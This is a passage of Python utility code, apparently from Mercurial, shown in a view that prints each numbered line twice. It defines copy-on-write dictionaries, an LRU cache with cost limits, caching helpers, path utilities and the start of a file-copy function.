1132 self[k] = v
1132 self[k] = v
1133
1133
1134 class cowdict(cow, dict):
1134 class cowdict(cow, dict):
1135 """copy-on-write dict
1135 """copy-on-write dict
1136
1136
1137 Be sure to call d = d.preparewrite() before writing to d.
1137 Be sure to call d = d.preparewrite() before writing to d.
1138
1138
1139 >>> a = cowdict()
1139 >>> a = cowdict()
1140 >>> a is a.preparewrite()
1140 >>> a is a.preparewrite()
1141 True
1141 True
1142 >>> b = a.copy()
1142 >>> b = a.copy()
1143 >>> b is a
1143 >>> b is a
1144 True
1144 True
1145 >>> c = b.copy()
1145 >>> c = b.copy()
1146 >>> c is a
1146 >>> c is a
1147 True
1147 True
1148 >>> a = a.preparewrite()
1148 >>> a = a.preparewrite()
1149 >>> b is a
1149 >>> b is a
1150 False
1150 False
1151 >>> a is a.preparewrite()
1151 >>> a is a.preparewrite()
1152 True
1152 True
1153 >>> c = c.preparewrite()
1153 >>> c = c.preparewrite()
1154 >>> b is c
1154 >>> b is c
1155 False
1155 False
1156 >>> b is b.preparewrite()
1156 >>> b is b.preparewrite()
1157 True
1157 True
1158 """
1158 """
1159
1159
1160 class cowsortdict(cow, sortdict):
1160 class cowsortdict(cow, sortdict):
1161 """copy-on-write sortdict
1161 """copy-on-write sortdict
1162
1162
1163 Be sure to call d = d.preparewrite() before writing to d.
1163 Be sure to call d = d.preparewrite() before writing to d.
1164 """
1164 """
1165
1165
1166 class transactional(object):
1166 class transactional(object):
1167 """Base class for making a transactional type into a context manager."""
1167 """Base class for making a transactional type into a context manager."""
1168 __metaclass__ = abc.ABCMeta
1168 __metaclass__ = abc.ABCMeta
1169
1169
1170 @abc.abstractmethod
1170 @abc.abstractmethod
1171 def close(self):
1171 def close(self):
1172 """Successfully closes the transaction."""
1172 """Successfully closes the transaction."""
1173
1173
1174 @abc.abstractmethod
1174 @abc.abstractmethod
1175 def release(self):
1175 def release(self):
1176 """Marks the end of the transaction.
1176 """Marks the end of the transaction.
1177
1177
1178 If the transaction has not been closed, it will be aborted.
1178 If the transaction has not been closed, it will be aborted.
1179 """
1179 """
1180
1180
1181 def __enter__(self):
1181 def __enter__(self):
1182 return self
1182 return self
1183
1183
1184 def __exit__(self, exc_type, exc_val, exc_tb):
1184 def __exit__(self, exc_type, exc_val, exc_tb):
1185 try:
1185 try:
1186 if exc_type is None:
1186 if exc_type is None:
1187 self.close()
1187 self.close()
1188 finally:
1188 finally:
1189 self.release()
1189 self.release()
1190
1190
1191 @contextlib.contextmanager
1191 @contextlib.contextmanager
1192 def acceptintervention(tr=None):
1192 def acceptintervention(tr=None):
1193 """A context manager that closes the transaction on InterventionRequired
1193 """A context manager that closes the transaction on InterventionRequired
1194
1194
1195 If no transaction was provided, this simply runs the body and returns
1195 If no transaction was provided, this simply runs the body and returns
1196 """
1196 """
1197 if not tr:
1197 if not tr:
1198 yield
1198 yield
1199 return
1199 return
1200 try:
1200 try:
1201 yield
1201 yield
1202 tr.close()
1202 tr.close()
1203 except error.InterventionRequired:
1203 except error.InterventionRequired:
1204 tr.close()
1204 tr.close()
1205 raise
1205 raise
1206 finally:
1206 finally:
1207 tr.release()
1207 tr.release()
1208
1208
1209 @contextlib.contextmanager
1209 @contextlib.contextmanager
1210 def nullcontextmanager():
1210 def nullcontextmanager():
1211 yield
1211 yield
1212
1212
1213 class _lrucachenode(object):
1213 class _lrucachenode(object):
1214 """A node in a doubly linked list.
1214 """A node in a doubly linked list.
1215
1215
1216 Holds a reference to nodes on either side as well as a key-value
1216 Holds a reference to nodes on either side as well as a key-value
1217 pair for the dictionary entry.
1217 pair for the dictionary entry.
1218 """
1218 """
1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1220
1220
1221 def __init__(self):
1221 def __init__(self):
1222 self.next = None
1222 self.next = None
1223 self.prev = None
1223 self.prev = None
1224
1224
1225 self.key = _notset
1225 self.key = _notset
1226 self.value = None
1226 self.value = None
1227 self.cost = 0
1227 self.cost = 0
1228
1228
1229 def markempty(self):
1229 def markempty(self):
1230 """Mark the node as emptied."""
1230 """Mark the node as emptied."""
1231 self.key = _notset
1231 self.key = _notset
1232 self.value = None
1232 self.value = None
1233 self.cost = 0
1233 self.cost = 0
1234
1234
1235 class lrucachedict(object):
1235 class lrucachedict(object):
1236 """Dict that caches most recent accesses and sets.
1236 """Dict that caches most recent accesses and sets.
1237
1237
1238 The dict consists of an actual backing dict - indexed by original
1238 The dict consists of an actual backing dict - indexed by original
1239 key - and a doubly linked circular list defining the order of entries in
1239 key - and a doubly linked circular list defining the order of entries in
1240 the cache.
1240 the cache.
1241
1241
1242 The head node is the newest entry in the cache. If the cache is full,
1242 The head node is the newest entry in the cache. If the cache is full,
1243 we recycle head.prev and make it the new head. Cache accesses result in
1243 we recycle head.prev and make it the new head. Cache accesses result in
1244 the node being moved to before the existing head and being marked as the
1244 the node being moved to before the existing head and being marked as the
1245 new head node.
1245 new head node.
1246
1246
1247 Items in the cache can be inserted with an optional "cost" value. This is
1247 Items in the cache can be inserted with an optional "cost" value. This is
1248 simply an integer that is specified by the caller. The cache can be queried
1248 simply an integer that is specified by the caller. The cache can be queried
1249 for the total cost of all items presently in the cache.
1249 for the total cost of all items presently in the cache.
1250
1250
1251 The cache can also define a maximum cost. If a cache insertion would
1251 The cache can also define a maximum cost. If a cache insertion would
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1253 nodes will be evicted to make room for the new code. This can be used
1253 nodes will be evicted to make room for the new code. This can be used
1254 to e.g. set a max memory limit and associate an estimated bytes size
1254 to e.g. set a max memory limit and associate an estimated bytes size
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1256 """
1256 """
1257 def __init__(self, max, maxcost=0):
1257 def __init__(self, max, maxcost=0):
1258 self._cache = {}
1258 self._cache = {}
1259
1259
1260 self._head = head = _lrucachenode()
1260 self._head = head = _lrucachenode()
1261 head.prev = head
1261 head.prev = head
1262 head.next = head
1262 head.next = head
1263 self._size = 1
1263 self._size = 1
1264 self.capacity = max
1264 self.capacity = max
1265 self.totalcost = 0
1265 self.totalcost = 0
1266 self.maxcost = maxcost
1266 self.maxcost = maxcost
1267
1267
1268 def __len__(self):
1268 def __len__(self):
1269 return len(self._cache)
1269 return len(self._cache)
1270
1270
1271 def __contains__(self, k):
1271 def __contains__(self, k):
1272 return k in self._cache
1272 return k in self._cache
1273
1273
1274 def __iter__(self):
1274 def __iter__(self):
1275 # We don't have to iterate in cache order, but why not.
1275 # We don't have to iterate in cache order, but why not.
1276 n = self._head
1276 n = self._head
1277 for i in range(len(self._cache)):
1277 for i in range(len(self._cache)):
1278 yield n.key
1278 yield n.key
1279 n = n.next
1279 n = n.next
1280
1280
1281 def __getitem__(self, k):
1281 def __getitem__(self, k):
1282 node = self._cache[k]
1282 node = self._cache[k]
1283 self._movetohead(node)
1283 self._movetohead(node)
1284 return node.value
1284 return node.value
1285
1285
1286 def insert(self, k, v, cost=0):
1286 def insert(self, k, v, cost=0):
1287 """Insert a new item in the cache with optional cost value."""
1287 """Insert a new item in the cache with optional cost value."""
1288 node = self._cache.get(k)
1288 node = self._cache.get(k)
1289 # Replace existing value and mark as newest.
1289 # Replace existing value and mark as newest.
1290 if node is not None:
1290 if node is not None:
1291 self.totalcost -= node.cost
1291 self.totalcost -= node.cost
1292 node.value = v
1292 node.value = v
1293 node.cost = cost
1293 node.cost = cost
1294 self.totalcost += cost
1294 self.totalcost += cost
1295 self._movetohead(node)
1295 self._movetohead(node)
1296
1296
1297 if self.maxcost:
1297 if self.maxcost:
1298 self._enforcecostlimit()
1298 self._enforcecostlimit()
1299
1299
1300 return
1300 return
1301
1301
1302 if self._size < self.capacity:
1302 if self._size < self.capacity:
1303 node = self._addcapacity()
1303 node = self._addcapacity()
1304 else:
1304 else:
1305 # Grab the last/oldest item.
1305 # Grab the last/oldest item.
1306 node = self._head.prev
1306 node = self._head.prev
1307
1307
1308 # At capacity. Kill the old entry.
1308 # At capacity. Kill the old entry.
1309 if node.key is not _notset:
1309 if node.key is not _notset:
1310 self.totalcost -= node.cost
1310 self.totalcost -= node.cost
1311 del self._cache[node.key]
1311 del self._cache[node.key]
1312
1312
1313 node.key = k
1313 node.key = k
1314 node.value = v
1314 node.value = v
1315 node.cost = cost
1315 node.cost = cost
1316 self.totalcost += cost
1316 self.totalcost += cost
1317 self._cache[k] = node
1317 self._cache[k] = node
1318 # And mark it as newest entry. No need to adjust order since it
1318 # And mark it as newest entry. No need to adjust order since it
1319 # is already self._head.prev.
1319 # is already self._head.prev.
1320 self._head = node
1320 self._head = node
1321
1321
1322 if self.maxcost:
1322 if self.maxcost:
1323 self._enforcecostlimit()
1323 self._enforcecostlimit()
1324
1324
1325 def __setitem__(self, k, v):
1325 def __setitem__(self, k, v):
1326 self.insert(k, v)
1326 self.insert(k, v)
1327
1327
1328 def __delitem__(self, k):
1328 def __delitem__(self, k):
1329 self.pop(k)
1329 self.pop(k)
1330
1330
1331 def pop(self, k, default=_notset):
1331 def pop(self, k, default=_notset):
1332 try:
1332 try:
1333 node = self._cache.pop(k)
1333 node = self._cache.pop(k)
1334 except KeyError:
1334 except KeyError:
1335 if default is _notset:
1335 if default is _notset:
1336 raise
1336 raise
1337 return default
1337 return default
1338 value = node.value
1338 value = node.value
1339 self.totalcost -= node.cost
1339 self.totalcost -= node.cost
1340 node.markempty()
1340 node.markempty()
1341
1341
1342 # Temporarily mark as newest item before re-adjusting head to make
1342 # Temporarily mark as newest item before re-adjusting head to make
1343 # this node the oldest item.
1343 # this node the oldest item.
1344 self._movetohead(node)
1344 self._movetohead(node)
1345 self._head = node.next
1345 self._head = node.next
1346
1346
1347 return value
1347 return value
1348
1348
1349 # Additional dict methods.
1349 # Additional dict methods.
1350
1350
1351 def get(self, k, default=None):
1351 def get(self, k, default=None):
1352 try:
1352 try:
1353 return self.__getitem__(k)
1353 return self.__getitem__(k)
1354 except KeyError:
1354 except KeyError:
1355 return default
1355 return default
1356
1356
1357 def peek(self, k, default=_notset):
1357 def peek(self, k, default=_notset):
1358 """Get the specified item without moving it to the head
1358 """Get the specified item without moving it to the head
1359
1359
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 that it doesn't mean peek() is thread safe.
1361 that it doesn't mean peek() is thread safe.
1362 """
1362 """
1363 try:
1363 try:
1364 node = self._cache[k]
1364 node = self._cache[k]
1365 return node.value
1365 return node.value
1366 except KeyError:
1366 except KeyError:
1367 if default is _notset:
1367 if default is _notset:
1368 raise
1368 raise
1369 return default
1369 return default
1370
1370
1371 def clear(self):
1371 def clear(self):
1372 n = self._head
1372 n = self._head
1373 while n.key is not _notset:
1373 while n.key is not _notset:
1374 self.totalcost -= n.cost
1374 self.totalcost -= n.cost
1375 n.markempty()
1375 n.markempty()
1376 n = n.next
1376 n = n.next
1377
1377
1378 self._cache.clear()
1378 self._cache.clear()
1379
1379
1380 def copy(self, capacity=None, maxcost=0):
1380 def copy(self, capacity=None, maxcost=0):
1381 """Create a new cache as a copy of the current one.
1381 """Create a new cache as a copy of the current one.
1382
1382
1383 By default, the new cache has the same capacity as the existing one.
1383 By default, the new cache has the same capacity as the existing one.
1384 But, the cache capacity can be changed as part of performing the
1384 But, the cache capacity can be changed as part of performing the
1385 copy.
1385 copy.
1386
1386
1387 Items in the copy have an insertion/access order matching this
1387 Items in the copy have an insertion/access order matching this
1388 instance.
1388 instance.
1389 """
1389 """
1390
1390
1391 capacity = capacity or self.capacity
1391 capacity = capacity or self.capacity
1392 maxcost = maxcost or self.maxcost
1392 maxcost = maxcost or self.maxcost
1393 result = lrucachedict(capacity, maxcost=maxcost)
1393 result = lrucachedict(capacity, maxcost=maxcost)
1394
1394
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 # has the correct ordering.
1396 # has the correct ordering.
1397
1397
1398 # Find the first non-empty entry.
1398 # Find the first non-empty entry.
1399 n = self._head.prev
1399 n = self._head.prev
1400 while n.key is _notset and n is not self._head:
1400 while n.key is _notset and n is not self._head:
1401 n = n.prev
1401 n = n.prev
1402
1402
1403 # We could potentially skip the first N items when decreasing capacity.
1403 # We could potentially skip the first N items when decreasing capacity.
1404 # But let's keep it simple unless it is a performance problem.
1404 # But let's keep it simple unless it is a performance problem.
1405 for i in range(len(self._cache)):
1405 for i in range(len(self._cache)):
1406 result.insert(n.key, n.value, cost=n.cost)
1406 result.insert(n.key, n.value, cost=n.cost)
1407 n = n.prev
1407 n = n.prev
1408
1408
1409 return result
1409 return result
1410
1410
1411 def popoldest(self):
1411 def popoldest(self):
1412 """Remove the oldest item from the cache.
1412 """Remove the oldest item from the cache.
1413
1413
1414 Returns the (key, value) describing the removed cache entry.
1414 Returns the (key, value) describing the removed cache entry.
1415 """
1415 """
1416 if not self._cache:
1416 if not self._cache:
1417 return
1417 return
1418
1418
1419 # Walk the linked list backwards starting at tail node until we hit
1419 # Walk the linked list backwards starting at tail node until we hit
1420 # a non-empty node.
1420 # a non-empty node.
1421 n = self._head.prev
1421 n = self._head.prev
1422 while n.key is _notset:
1422 while n.key is _notset:
1423 n = n.prev
1423 n = n.prev
1424
1424
1425 key, value = n.key, n.value
1425 key, value = n.key, n.value
1426
1426
1427 # And remove it from the cache and mark it as empty.
1427 # And remove it from the cache and mark it as empty.
1428 del self._cache[n.key]
1428 del self._cache[n.key]
1429 self.totalcost -= n.cost
1429 self.totalcost -= n.cost
1430 n.markempty()
1430 n.markempty()
1431
1431
1432 return key, value
1432 return key, value
1433
1433
1434 def _movetohead(self, node):
1434 def _movetohead(self, node):
1435 """Mark a node as the newest, making it the new head.
1435 """Mark a node as the newest, making it the new head.
1436
1436
1437 When a node is accessed, it becomes the freshest entry in the LRU
1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 list, which is denoted by self._head.
1438 list, which is denoted by self._head.
1439
1439
1440 Visually, let's make ``N`` the new head node (* denotes head):
1440 Visually, let's make ``N`` the new head node (* denotes head):
1441
1441
1442 previous/oldest <-> head <-> next/next newest
1442 previous/oldest <-> head <-> next/next newest
1443
1443
1444 ----<->--- A* ---<->-----
1444 ----<->--- A* ---<->-----
1445 | |
1445 | |
1446 E <-> D <-> N <-> C <-> B
1446 E <-> D <-> N <-> C <-> B
1447
1447
1448 To:
1448 To:
1449
1449
1450 ----<->--- N* ---<->-----
1450 ----<->--- N* ---<->-----
1451 | |
1451 | |
1452 E <-> D <-> C <-> B <-> A
1452 E <-> D <-> C <-> B <-> A
1453
1453
1454 This requires the following moves:
1454 This requires the following moves:
1455
1455
1456 C.next = D (node.prev.next = node.next)
1456 C.next = D (node.prev.next = node.next)
1457 D.prev = C (node.next.prev = node.prev)
1457 D.prev = C (node.next.prev = node.prev)
1458 E.next = N (head.prev.next = node)
1458 E.next = N (head.prev.next = node)
1459 N.prev = E (node.prev = head.prev)
1459 N.prev = E (node.prev = head.prev)
1460 N.next = A (node.next = head)
1460 N.next = A (node.next = head)
1461 A.prev = N (head.prev = node)
1461 A.prev = N (head.prev = node)
1462 """
1462 """
1463 head = self._head
1463 head = self._head
1464 # C.next = D
1464 # C.next = D
1465 node.prev.next = node.next
1465 node.prev.next = node.next
1466 # D.prev = C
1466 # D.prev = C
1467 node.next.prev = node.prev
1467 node.next.prev = node.prev
1468 # N.prev = E
1468 # N.prev = E
1469 node.prev = head.prev
1469 node.prev = head.prev
1470 # N.next = A
1470 # N.next = A
1471 # It is tempting to do just "head" here, however if node is
1471 # It is tempting to do just "head" here, however if node is
1472 # adjacent to head, this will do bad things.
1472 # adjacent to head, this will do bad things.
1473 node.next = head.prev.next
1473 node.next = head.prev.next
1474 # E.next = N
1474 # E.next = N
1475 node.next.prev = node
1475 node.next.prev = node
1476 # A.prev = N
1476 # A.prev = N
1477 node.prev.next = node
1477 node.prev.next = node
1478
1478
1479 self._head = node
1479 self._head = node
1480
1480
1481 def _addcapacity(self):
1481 def _addcapacity(self):
1482 """Add a node to the circular linked list.
1482 """Add a node to the circular linked list.
1483
1483
1484 The new node is inserted before the head node.
1484 The new node is inserted before the head node.
1485 """
1485 """
1486 head = self._head
1486 head = self._head
1487 node = _lrucachenode()
1487 node = _lrucachenode()
1488 head.prev.next = node
1488 head.prev.next = node
1489 node.prev = head.prev
1489 node.prev = head.prev
1490 node.next = head
1490 node.next = head
1491 head.prev = node
1491 head.prev = node
1492 self._size += 1
1492 self._size += 1
1493 return node
1493 return node
1494
1494
1495 def _enforcecostlimit(self):
1495 def _enforcecostlimit(self):
1496 # This should run after an insertion. It should only be called if total
1496 # This should run after an insertion. It should only be called if total
1497 # cost limits are being enforced.
1497 # cost limits are being enforced.
1498 # The most recently inserted node is never evicted.
1498 # The most recently inserted node is never evicted.
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 return
1500 return
1501
1501
1502 # This is logically equivalent to calling popoldest() until we
1502 # This is logically equivalent to calling popoldest() until we
1503 # free up enough cost. We don't do that since popoldest() needs
1503 # free up enough cost. We don't do that since popoldest() needs
1504 # to walk the linked list and doing this in a loop would be
1504 # to walk the linked list and doing this in a loop would be
1505 # quadratic. So we find the first non-empty node and then
1505 # quadratic. So we find the first non-empty node and then
1506 # walk nodes until we free up enough capacity.
1506 # walk nodes until we free up enough capacity.
1507 #
1507 #
1508 # If we only removed the minimum number of nodes to free enough
1508 # If we only removed the minimum number of nodes to free enough
1509 # cost at insert time, chances are high that the next insert would
1509 # cost at insert time, chances are high that the next insert would
1510 # also require pruning. This would effectively constitute quadratic
1510 # also require pruning. This would effectively constitute quadratic
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 # target cost that is a percentage of the max cost. This will tend
1512 # target cost that is a percentage of the max cost. This will tend
1513 # to free more nodes when the high water mark is reached, which
1513 # to free more nodes when the high water mark is reached, which
1514 # lowers the chances of needing to prune on the subsequent insert.
1514 # lowers the chances of needing to prune on the subsequent insert.
1515 targetcost = int(self.maxcost * 0.75)
1515 targetcost = int(self.maxcost * 0.75)
1516
1516
1517 n = self._head.prev
1517 n = self._head.prev
1518 while n.key is _notset:
1518 while n.key is _notset:
1519 n = n.prev
1519 n = n.prev
1520
1520
1521 while len(self) > 1 and self.totalcost > targetcost:
1521 while len(self) > 1 and self.totalcost > targetcost:
1522 del self._cache[n.key]
1522 del self._cache[n.key]
1523 self.totalcost -= n.cost
1523 self.totalcost -= n.cost
1524 n.markempty()
1524 n.markempty()
1525 n = n.prev
1525 n = n.prev
1526
1526
1527 def lrucachefunc(func):
1527 def lrucachefunc(func):
1528 '''cache most recent results of function calls'''
1528 '''cache most recent results of function calls'''
1529 cache = {}
1529 cache = {}
1530 order = collections.deque()
1530 order = collections.deque()
1531 if func.__code__.co_argcount == 1:
1531 if func.__code__.co_argcount == 1:
1532 def f(arg):
1532 def f(arg):
1533 if arg not in cache:
1533 if arg not in cache:
1534 if len(cache) > 20:
1534 if len(cache) > 20:
1535 del cache[order.popleft()]
1535 del cache[order.popleft()]
1536 cache[arg] = func(arg)
1536 cache[arg] = func(arg)
1537 else:
1537 else:
1538 order.remove(arg)
1538 order.remove(arg)
1539 order.append(arg)
1539 order.append(arg)
1540 return cache[arg]
1540 return cache[arg]
1541 else:
1541 else:
1542 def f(*args):
1542 def f(*args):
1543 if args not in cache:
1543 if args not in cache:
1544 if len(cache) > 20:
1544 if len(cache) > 20:
1545 del cache[order.popleft()]
1545 del cache[order.popleft()]
1546 cache[args] = func(*args)
1546 cache[args] = func(*args)
1547 else:
1547 else:
1548 order.remove(args)
1548 order.remove(args)
1549 order.append(args)
1549 order.append(args)
1550 return cache[args]
1550 return cache[args]
1551
1551
1552 return f
1552 return f
1553
1553
1554 class propertycache(object):
1554 class propertycache(object):
1555 def __init__(self, func):
1555 def __init__(self, func):
1556 self.func = func
1556 self.func = func
1557 self.name = func.__name__
1557 self.name = func.__name__
1558 def __get__(self, obj, type=None):
1558 def __get__(self, obj, type=None):
1559 result = self.func(obj)
1559 result = self.func(obj)
1560 self.cachevalue(obj, result)
1560 self.cachevalue(obj, result)
1561 return result
1561 return result
1562
1562
1563 def cachevalue(self, obj, value):
1563 def cachevalue(self, obj, value):
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1565 obj.__dict__[self.name] = value
1565 obj.__dict__[self.name] = value
1566
1566
1567 def clearcachedproperty(obj, prop):
1567 def clearcachedproperty(obj, prop):
1568 '''clear a cached property value, if one has been set'''
1568 '''clear a cached property value, if one has been set'''
1569 prop = pycompat.sysstr(prop)
1569 prop = pycompat.sysstr(prop)
1570 if prop in obj.__dict__:
1570 if prop in obj.__dict__:
1571 del obj.__dict__[prop]
1571 del obj.__dict__[prop]
1572
1572
1573 def increasingchunks(source, min=1024, max=65536):
1573 def increasingchunks(source, min=1024, max=65536):
1574 '''return no less than min bytes per chunk while data remains,
1574 '''return no less than min bytes per chunk while data remains,
1575 doubling min after each chunk until it reaches max'''
1575 doubling min after each chunk until it reaches max'''
1576 def log2(x):
1576 def log2(x):
1577 if not x:
1577 if not x:
1578 return 0
1578 return 0
1579 i = 0
1579 i = 0
1580 while x:
1580 while x:
1581 x >>= 1
1581 x >>= 1
1582 i += 1
1582 i += 1
1583 return i - 1
1583 return i - 1
1584
1584
1585 buf = []
1585 buf = []
1586 blen = 0
1586 blen = 0
1587 for chunk in source:
1587 for chunk in source:
1588 buf.append(chunk)
1588 buf.append(chunk)
1589 blen += len(chunk)
1589 blen += len(chunk)
1590 if blen >= min:
1590 if blen >= min:
1591 if min < max:
1591 if min < max:
1592 min = min << 1
1592 min = min << 1
1593 nmin = 1 << log2(blen)
1593 nmin = 1 << log2(blen)
1594 if nmin > min:
1594 if nmin > min:
1595 min = nmin
1595 min = nmin
1596 if min > max:
1596 if min > max:
1597 min = max
1597 min = max
1598 yield ''.join(buf)
1598 yield ''.join(buf)
1599 blen = 0
1599 blen = 0
1600 buf = []
1600 buf = []
1601 if buf:
1601 if buf:
1602 yield ''.join(buf)
1602 yield ''.join(buf)
1603
1603
1604 def always(fn):
1604 def always(fn):
1605 return True
1605 return True
1606
1606
1607 def never(fn):
1607 def never(fn):
1608 return False
1608 return False
1609
1609
1610 def nogc(func):
1610 def nogc(func):
1611 """disable garbage collector
1611 """disable garbage collector
1612
1612
1613 Python's garbage collector triggers a GC each time a certain number of
1613 Python's garbage collector triggers a GC each time a certain number of
1614 container objects (the number being defined by gc.get_threshold()) are
1614 container objects (the number being defined by gc.get_threshold()) are
1615 allocated even when marked not to be tracked by the collector. Tracking has
1615 allocated even when marked not to be tracked by the collector. Tracking has
1616 no effect on when GCs are triggered, only on what objects the GC looks
1616 no effect on when GCs are triggered, only on what objects the GC looks
1617 into. As a workaround, disable GC while building complex (huge)
1617 into. As a workaround, disable GC while building complex (huge)
1618 containers.
1618 containers.
1619
1619
1620 This garbage collector issue have been fixed in 2.7. But it still affect
1620 This garbage collector issue have been fixed in 2.7. But it still affect
1621 CPython's performance.
1621 CPython's performance.
1622 """
1622 """
1623 def wrapper(*args, **kwargs):
1623 def wrapper(*args, **kwargs):
1624 gcenabled = gc.isenabled()
1624 gcenabled = gc.isenabled()
1625 gc.disable()
1625 gc.disable()
1626 try:
1626 try:
1627 return func(*args, **kwargs)
1627 return func(*args, **kwargs)
1628 finally:
1628 finally:
1629 if gcenabled:
1629 if gcenabled:
1630 gc.enable()
1630 gc.enable()
1631 return wrapper
1631 return wrapper
1632
1632
1633 if pycompat.ispypy:
1633 if pycompat.ispypy:
1634 # PyPy runs slower with gc disabled
1634 # PyPy runs slower with gc disabled
1635 nogc = lambda x: x
1635 nogc = lambda x: x
1636
1636
1637 def pathto(root, n1, n2):
1637 def pathto(root, n1, n2):
1638 '''return the relative path from one place to another.
1638 '''return the relative path from one place to another.
1639 root should use os.sep to separate directories
1639 root should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1641 n2 should use "/" to separate directories
1641 n2 should use "/" to separate directories
1642 returns an os.sep-separated path.
1642 returns an os.sep-separated path.
1643
1643
1644 If n1 is a relative path, it's assumed it's
1644 If n1 is a relative path, it's assumed it's
1645 relative to root.
1645 relative to root.
1646 n2 should always be relative to root.
1646 n2 should always be relative to root.
1647 '''
1647 '''
1648 if not n1:
1648 if not n1:
1649 return localpath(n2)
1649 return localpath(n2)
1650 if os.path.isabs(n1):
1650 if os.path.isabs(n1):
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1652 return os.path.join(root, localpath(n2))
1652 return os.path.join(root, localpath(n2))
1653 n2 = '/'.join((pconvert(root), n2))
1653 n2 = '/'.join((pconvert(root), n2))
1654 a, b = splitpath(n1), n2.split('/')
1654 a, b = splitpath(n1), n2.split('/')
1655 a.reverse()
1655 a.reverse()
1656 b.reverse()
1656 b.reverse()
1657 while a and b and a[-1] == b[-1]:
1657 while a and b and a[-1] == b[-1]:
1658 a.pop()
1658 a.pop()
1659 b.pop()
1659 b.pop()
1660 b.reverse()
1660 b.reverse()
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1662
1662
1663 # the location of data files matching the source code
1663 # the location of data files matching the source code
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1665 # executable version (py2exe) doesn't support __file__
1665 # executable version (py2exe) doesn't support __file__
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1667 else:
1667 else:
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1669
1669
1670 i18n.setdatapath(datapath)
1670 i18n.setdatapath(datapath)
1671
1671
1672 def checksignature(func):
1672 def checksignature(func):
1673 '''wrap a function with code to check for calling errors'''
1673 '''wrap a function with code to check for calling errors'''
1674 def check(*args, **kwargs):
1674 def check(*args, **kwargs):
1675 try:
1675 try:
1676 return func(*args, **kwargs)
1676 return func(*args, **kwargs)
1677 except TypeError:
1677 except TypeError:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1679 raise error.SignatureError
1679 raise error.SignatureError
1680 raise
1680 raise
1681
1681
1682 return check
1682 return check
1683
1683
1684 # a whilelist of known filesystems where hardlink works reliably
1684 # a whilelist of known filesystems where hardlink works reliably
1685 _hardlinkfswhitelist = {
1685 _hardlinkfswhitelist = {
1686 'apfs',
1686 'apfs',
1687 'btrfs',
1687 'btrfs',
1688 'ext2',
1688 'ext2',
1689 'ext3',
1689 'ext3',
1690 'ext4',
1690 'ext4',
1691 'hfs',
1691 'hfs',
1692 'jfs',
1692 'jfs',
1693 'NTFS',
1693 'NTFS',
1694 'reiserfs',
1694 'reiserfs',
1695 'tmpfs',
1695 'tmpfs',
1696 'ufs',
1696 'ufs',
1697 'xfs',
1697 'xfs',
1698 'zfs',
1698 'zfs',
1699 }
1699 }
1700
1700
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1702 '''copy a file, preserving mode and optionally other stat info like
1702 '''copy a file, preserving mode and optionally other stat info like
1703 atime/mtime
1703 atime/mtime
1704
1704
1705 checkambig argument is used with filestat, and is useful only if
1705 checkambig argument is used with filestat, and is useful only if
1706 destination file is guarded by any lock (e.g. repo.lock or
1706 destination file is guarded by any lock (e.g. repo.lock or
1707 repo.wlock).
1707 repo.wlock).
1708
1708
1709 copystat and checkambig should be exclusive.
1709 copystat and checkambig should be exclusive.
1710 '''
1710 '''
1711 assert not (copystat and checkambig)
1711 assert not (copystat and checkambig)
1712 oldstat = None
1712 oldstat = None
1713 if os.path.lexists(dest):
1713 if os.path.lexists(dest):
1714 if checkambig:
1714 if checkambig:
1715 oldstat = checkambig and filestat.frompath(dest)
1715 oldstat = checkambig and filestat.frompath(dest)
1716 unlink(dest)
1716 unlink(dest)
1717 if hardlink:
1717 if hardlink:
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1719 # unless we are confident that dest is on a whitelisted filesystem.
1719 # unless we are confident that dest is on a whitelisted filesystem.
1720 try:
1720 try:
1721 fstype = getfstype(os.path.dirname(dest))
1721 fstype = getfstype(os.path.dirname(dest))
1722 except OSError:
1722 except OSError:
1723 fstype = None
1723 fstype = None
1724 if fstype not in _hardlinkfswhitelist:
1724 if fstype not in _hardlinkfswhitelist:
1725 hardlink = False
1725 hardlink = False
1726 if hardlink:
1726 if hardlink:
1727 try:
1727 try:
1728 oslink(src, dest)
1728 oslink(src, dest)
1729 return
1729 return
1730 except (IOError, OSError):
1730 except (IOError, OSError):
1731 pass # fall back to normal copy
1731 pass # fall back to normal copy
1732 if os.path.islink(src):
1732 if os.path.islink(src):
1733 os.symlink(os.readlink(src), dest)
1733 os.symlink(os.readlink(src), dest)
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1735 # for them anyway
1735 # for them anyway
1736 else:
1736 else:
1737 try:
1737 try:
1738 shutil.copyfile(src, dest)
